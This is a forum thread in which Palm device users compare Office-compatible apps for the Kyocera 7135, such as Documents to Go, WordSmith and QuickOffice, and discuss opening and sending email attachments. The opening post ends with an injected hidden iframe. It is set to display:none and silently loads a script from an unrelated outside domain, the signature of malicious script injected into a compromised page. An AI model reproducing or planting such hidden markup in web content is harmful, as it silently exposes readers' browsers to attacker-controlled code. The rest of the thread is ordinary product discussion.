+ Reply to Thread
Page 1 of 2 1 2 LastLast

Microsoft Office Products on 7135

I checked but didn't see this subject discussed.
    Has anyone tried the 3rd party apps for viewing and editing Word, Excel, Power Point and Access? What are the best apps and what do they really do? Thanks in advance for any input.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Try this article:
    http://www.brighthand.com/article/Office_comparison

and this...
    http://www.infosync.no/news/2002/n/2031.html

and this...
    http://www.infosync.no/news/2002/n/2289.html

Hope these review's help you out. I personally use Documents to Go and it works for what i need it for.
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

poked back in
    I use Wordsmith for Word and QuickSheets for Excel.

I like the whole "QuickOffice" suite. I know Wordsmith is generally considered better for the "power user"... but I like the one central app for syncing docs for all of the MS Office apps. As far as I know there is no suite that syncs Access DB's, but there are some Palm OS apps out there that sync with Access, and I have been interested in trying them, but haven't had time. PenDragon is the one I was most interested in, because you could not only sync data, but you could design Palm OS based "forms" that have point and click boxes and fields to capture data, and then have it update your main DB when you sync. I still want to try that soon... but DB development is no longer at the top of my job description at this moment.

Let us know what you like best after you've tried some of the apps out.
    Please visit my picture site: Robert-O-Rama :)

Thanks a lot Byrd Dog and M3wThr33 for the above info and links - very helpful. I am anxious to try these programs and hope to qualify as a "friendly user" and get my 7135 on 1/27. Sounds like Verizon is getting close to a release.

I have a question to you MS Office-on-Palm experts. I want to open Word, Excel and Powerpoint attachments on my 7135. I don't need to send these files on in native format - I only want to view them on my 7135. Which combination of mail app and office suite do you recommend for this? I currently have Snappermail and but it currently doesn't support these attachments.

Your help would be much appreciated!

You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

Originally posted by ZZLeGrand
    I have a question to you MS Office-on-Palm experts. I want to open Word, Excel and Powerpoint attachments on my 7135. I don't need to send these files on in native format - I only want to view them on my 7135. Which combination of mail app and office suite do you recommend for this? I currently have Snappermail and but it currently doesn't support these attachments.

Your help would be much appreciated!
    I think you can use Quickoffice with snappermail. Its only for Word Docs but they have an email you can foward the attached DOC file and it sends it right back a as a quickoffice PDB.

I read that on the Snappermail FAQ I think -- I don't own snapper so you'll have to test it yourself.

Good luck. Please let us know what you figure out if you find something that works.
    iPhone therefore iAm.

I am using DataViz Docs to Go with no problems... Got the std version for word & excel docs only, no email etc...
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

Originally posted by larryganz
    I am using DataViz Docs to Go with no problems... Got the std version for word & excel docs only, no email etc...
    You say "no email" - what does that mean? Does that mean that Docs to Go doesn't work with email? If it does work with email attachments, which email app are you using?

I use WordSmith, as I think it's the most flexible of the Word-type products. Sending and receiving Word attachments on the Palm is something I have been working on....

WordSmith's web site links to a product called Corsoft Aileron, which is an email client. They theoretically conduit your email attachments; i.e., the email goes through their server on its way to the recipient, during which process the attachment is converted from Word to Palm format or vice versa. Unfortunately, I've tried this software on two Visors of completely different type ,o/s, etc. (Deluxe, Prism), and it's worked on neither of them. Their tech support has been very friendly, but not gotten me an answer yet. I'd be very interested to know if anyone else is using WordSmith and has this functionality working? Alternatively, if there are any other WordSmith users out there who were to give this product a try (there's a free trial), I'd be very curious about their experiences, especially as relates to the 7135. Perhaps it's a problem with Visors or something, although that seems unlikely. If it works, it looks like a cool thing.

Originally posted by turboCat
    I use WordSmith, as I think it's the most flexible of the Word-type products. Sending and receiving Word attachments on the Palm is something I have been working on....

WordSmith's web site links to a product called Corsoft Aileron, which is an email client. They theoretically conduit your email attachments; i.e., the email goes through their server on its way to the recipient, during which process the attachment is converted from Word to Palm format or vice versa. Unfortunately, I've tried this software on two Visors of completely different type ,o/s, etc. (Deluxe, Prism), and it's worked on neither of them. Their tech support has been very friendly, but not gotten me an answer yet. I'd be very interested to know if anyone else is using WordSmith and has this functionality working? Alternatively, if there are any other WordSmith users out there who were to give this product a try (there's a free trial), I'd be very curious about their experiences, especially as relates to the 7135. Perhaps it's a problem with Visors or something, although that seems unlikely. If it works, it looks like a cool thing.

Thanks a lot - this is exactly the kind of information I was looking forward. Let me know if you succeed in getting this to all work as designed. I like the idea of the conversion happening automatically as a service between your own mail server and the 7135. That sounds really cool if it works as you said. I may just take the plunge and become the human guinea pig/poster child for this option. Please send me relevant links. Again, thanks a lot for this great information.

I too LOVE WordSmith. I have never never tried to email a WordSmith doc, but I would love to be able to. So does SnapperMail not do this?
    Let us know if any of you are ever able to email WS docs.
    Thanks
    ~'kito
    pdaPhoneHome Moderator

Originally posted by ZZLeGrand
    I may just take the plunge and become the human guinea pig/poster child for this option. Please send me relevant links. Again, thanks a lot for this great information.
    You're very welcome. If you try it too, I get to find out more info as well.

Here's the link for WordSmith: http://www.bluenomad.com/ws/prod_wordsmith_details.html . (These are the same people that make BackupBuddy, BTW.)

Here is Corsoft: http://www.corsoft.net/home.asp . There's also a link from the WordSmith page, that looks like it goes right to the demo download. If you end up talking to them, both their email and web chat tech support folks were quite responsive. I may see if there's a new version since last I tried this (put the project on hold for the holidays), and try again. *bweep bweep*! (Sound my friend's guinea pig makes. )

Markito, I haven't tried SnapperMail, although it's on my list of things to do. It looked very interesting. When I was reading about it a few months ago, the question I had was whether it emailed the attachment from the Palm in a format that only the Palm could read, or whether it was an .rtf or somesuch. Did I read somewhere that a new/production version of SnapperMail was coming out soon? If it does this trick, that also looks like a very nice client.

You say "no email" - what does that mean? Does that mean that Docs to Go doesn't work with email? If it does work with email attachments, which email app are you using?
    Right, the version with an email that supports sync email with attachments is $20 more, didn't need it.
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

I have Docs to Go and Inbox to Go, and am able to view jpegs, word (with pics!), excel, powerpoint attachments. pdf files work too, but unfortunately only the text comes thru (no pics). Files may be editted and sent back out on email, with resulting attachment being in doc, xls, or ppt format. It works decently well, not perfectly, but good enough to see what the attachments are and to do a few edits and send back. I wish it did other common file types as well though, such as tif, txt, etc. It would be good if it could at least save the attachment to the SD card for use by other programs.

I too am using Docs To go which I think is great. Besides, Word, Excell PDF and jpegs there isnt much I really need. Also, I have been using In Box To Go for my email which is finally working out fantastic! I highly reccomend these combinations DTG w IBTG if you need to keep small files and emails. The best thing about IBTG is that when I send an email it only uses one email address, my work. I currently have an i705 so I have my regular email account and my @palm.com account. Now with DTG and IBTG I can retrieve and send my email remotly and no one is the wiser!

This does sound interesting. Two questions:

Do Docs to Go and Inbox to Go allow you to create an attachment on the Palm, and then email it out to someone?

Also, are the documents as stored and sent from the Palm in native Word format (i.e., so that they can be read by the recipient without any conversion)?

Thanks!

Originally posted by turboCat
    Do Docs to Go and Inbox to Go allow you to create an attachment on the Palm, and then email it out to someone?

Also, are the documents as stored and sent from the Palm in native Word format (i.e., so that they can be read by the recipient without any conversion)?

Yes, you can also originate a word/excel document on the phone then email as an attachment. The file is not stored as native .doc or .xls file (it is stored as .pdb), but when you send as attachment, they are sent as true .doc or .xls attachments, so that your recipient can open it up on a PC. I have tested this by emailing myself and opening on my PC, and it works fine. Sometimes the color on the text doesn't quite come out the same, and Word to Go only has 7 fonts (not sure if there are more available yet), but it basically works.

Yes, there are more fonts available for Word To Go. Also, the only catch with the attachments I have found is they must be in DTG already. I have some pdf files on the palm that are not stored in DTG and I could not get them. Otherwise it is great especially if you get the full version you can see charts and ppt files.